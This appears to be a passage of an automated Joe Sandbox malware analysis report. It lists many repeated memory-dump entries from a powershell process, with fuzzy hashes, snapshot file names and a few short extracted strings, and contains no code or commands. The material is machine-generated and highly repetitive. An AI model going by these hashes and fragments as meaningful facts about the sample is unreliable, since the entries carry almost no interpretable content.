                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0d0fd50938854c28836490ed096b5cb949d6d015f1594c60f84deec77a7b904f
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a0c9324c9b64de44041fe558ae268dd2b57ba1df3a65f661465fccf39b2152c0
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d0fd50938854c28836490ed096b5cb949d6d015f1594c60f84deec77a7b904f
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3016970300618DFD7A89BA5D884A2B77FAEBC8315B54442EEA4AC3B80DB75E8018B50
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 99444c5de0d7f60690cb6532f2edadd10e1295e397b631e1f16e7df5cfbca4b0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 647296a85e8f59ca7fd85955657ee930d0a7b5c2c71f128362fc6dfe820f2d27
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99444c5de0d7f60690cb6532f2edadd10e1295e397b631e1f16e7df5cfbca4b0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0210634A10204CFCB08DFA4D498E9DBBB2EF89325F159468D901AB3A5DB35EC81CF50
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fb7450fcf8f8bbb269ce7cb923cc20e3ea20cf221f841f0f5f26e66ac89616d3
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8d57b240a86d79e586a18e5f99e34ce64bed1aa68d8bb7ffa333821d1de1cad5
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb7450fcf8f8bbb269ce7cb923cc20e3ea20cf221f841f0f5f26e66ac89616d3
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 150142316057209FC3209629C850AABBBD9AFC5254F05842AED45CB304DBB0EC04C7A1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: cb4132b79a61030dad1ae2616258812e391cb642ccdf161ad3174384863fb433
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: bcb93936ab270737ff28c9ec98a865e71a6b6d80b31ec48f34ec4ecb57162ba0
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb4132b79a61030dad1ae2616258812e391cb642ccdf161ad3174384863fb433
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB014F32B04204EFDB15DA6AE404ADEB7E9EF95761F00C07AE859C7340DB75E901CB60
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: d02fdfa8fd5b46c886bbb4381d11143841283a363c16eed72f442e9f3a0f0b5f
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: caa2146cd7d084209ea34c6216fde2c1db1647c3b71775feaf5e926addcb5411
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d02fdfa8fd5b46c886bbb4381d11143841283a363c16eed72f442e9f3a0f0b5f
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02018135785B50AFDB357A26B81833A7AA6ABC0627F14447DD94AC2B80CB7C8CC9C750
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bae818afe6e5a8492567341731499614bfc183a957d13f1c34650e9befa13a7b
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c8d9b7d4cea3759f00fe1498e99e819290c4e393342388963b3d03f7d7c56323
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bae818afe6e5a8492567341731499614bfc183a957d13f1c34650e9befa13a7b
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B010432D10A1A9ACB04DEA4D8444DEF772EFD9314F164626E6113B160EBB02A5ACAE1
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 46cd8161ca46e8f9a13abb59088010ab807c5f8762f7a0d686aa87d60c30aeb8
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8d1b0829380a70c60e582e044fb7803ea686f18f5ec45029ce3c1508a1a23235
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46cd8161ca46e8f9a13abb59088010ab807c5f8762f7a0d686aa87d60c30aeb8
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74111774B00108CFDB48EF64D599A6DBBF2EF88305F654169E902D73A1CB34AD42CB41
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7d5bb52cf313a27e05a7620d8a806bc155cad68881f3bb9928bf07c81f1b012d
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9206f66bbb98653f2e59b7cd48c884a12675f005c65b1c9d1e04cfb787ce8a58
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d5bb52cf313a27e05a7620d8a806bc155cad68881f3bb9928bf07c81f1b012d
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFD05E352001109FC701EB68E94CD957BE9EF4C355B0240A9FA098B322CF35AC008B91
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 22f4da7341964ae74d7e1189ef92ad00deee07aaa26f45cfc32fd600aeb6c9fc
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 53b21c618b2c838b5579afc7d15599fb547b0c3cfc0e4c119e1df928fdac675b
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22f4da7341964ae74d7e1189ef92ad00deee07aaa26f45cfc32fd600aeb6c9fc
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69E0677594424ECFEB40EF90D95A7ADBBB2BF44305F600519D102E6680CB781946DF84
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9e5446e5b005cf500c6f1ddad254fe740f1e35be90a31fef12f8d846c1b304f5
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7bf616dcee3871f79b458d21d7b73459add24aba6848bf38ea6d2860d9e53aa6
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5446e5b005cf500c6f1ddad254fe740f1e35be90a31fef12f8d846c1b304f5
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58C01238200A70CBCB249A28E04868A73F1BB48A10F00450AD44283B40C7B9EC81CA80
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: df49c6f2fb6b92fae764d0898bdf2334ab5be29eed8c9a6dbb31d442ecfcb344
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e2b0090a9534f49e1688b449003fdbf54ecf93c3769c396cce7c2ed1def09da4
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df49c6f2fb6b92fae764d0898bdf2334ab5be29eed8c9a6dbb31d442ecfcb344
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADB0123374801047054C154A701806CF337DAD02762150033E30AC51108A150E278140
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 46091221cb5bbab1d8053f43da94c30ed90afa1070c342ba987dcb05499750cf
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a99290c0172f3816a229c3e34850f74385173b7da487f611413a25eb9078fb42
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46091221cb5bbab1d8053f43da94c30ed90afa1070c342ba987dcb05499750cf
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55B0123374C010470544124A704806CF367DAD03762650023E30AC55008A254D674180
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
Similarity
• API ID:
• String ID: "$@
• API String ID: 0-1136454570
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
Similarity
• API ID:
• String ID: Xc4l$\v4l
• API String ID: 0-1211493696
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
Similarity
• API ID:
• String ID: KfMj^
• API String ID: 0-358021004
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
